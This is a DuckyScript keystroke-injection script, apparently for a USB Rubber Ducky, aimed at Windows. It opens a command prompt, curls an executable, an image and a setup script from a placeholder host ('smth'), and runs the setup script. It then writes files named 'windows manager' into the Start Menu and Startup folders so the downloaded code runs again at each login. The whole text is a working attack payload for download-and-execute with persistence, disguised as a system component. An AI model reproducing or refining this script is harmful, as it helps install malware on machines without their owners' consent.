DELAY 2500
GUI r
DELAY 250
STRING cmd
DELAY 250
ENTER
DELAY 250
STRING cd C:
ENTER
DELAY 100
STRING cd %APPDATA%
ENTER
DELAY 100
STRING cd Microsoft\Windows\Start Menu\Programs
ENTER
DELAY 100
STRING echo ^curl smth ^> "windows manager.exe" ^&^& ^curl smth ^> "img.png" ^&^& ^curl smth ^> "setup.cmd" ^&^& setup.cmd ^&^& ^cd Startup ^&^& windows manager.cmd > "windows manager.cmd"
ENTER
DELAY 100
STRING echo WScript.Sleep 100; Dim x; ^Set x = Wscript.CreateObject("WScript.Shell"); x.run("Startup/windows manager.cmd") > "windows manager.vbs"
ENTER
DELAY 100
STRING cd Startup
ENTER
DELAY 100
STRING echo ^cd .. windows manager.cmd > "windows manager.cmd"
ENTER
DELAY 100
STRING windows manager.cmd
ENTER
DELAY 100
